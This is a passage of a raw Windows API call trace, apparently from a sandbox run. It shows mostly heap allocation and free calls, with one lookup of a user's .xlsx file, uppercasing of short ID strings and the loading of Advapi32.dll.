0x2aab0f8 [0220.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0220.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0220.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.237] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0220.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0220.237] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0220.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0220.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0220.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0220.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0220.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0220.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0220.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.266] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/RRwZ.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cd50b0, ftCreationTime.dwHighDateTime=0x1d5b39a, ftLastAccessTime.dwLowDateTime=0xe8718a90, ftLastAccessTime.dwHighDateTime=0x1d59956, ftLastWriteTime.dwLowDateTime=0xe8718a90, ftLastWriteTime.dwHighDateTime=0x1d59956, nFileSizeHigh=0x0, nFileSizeLow=0x13fe5, dwReserved0=0x0, dwReserved1=0x0, cFileName="RRwZ.xlsx", cAlternateFileName="RRWZ~1.XLS")) returned 0x9e2078 [0220.266] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0220.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0220.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.268] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.268] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0220.268] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.268] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0220.268] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.268] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.268] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.268] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.269] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0220.269] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.269] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.270] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.270] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.270] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.270] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.270] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.271] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0220.271] HeapFree (in: 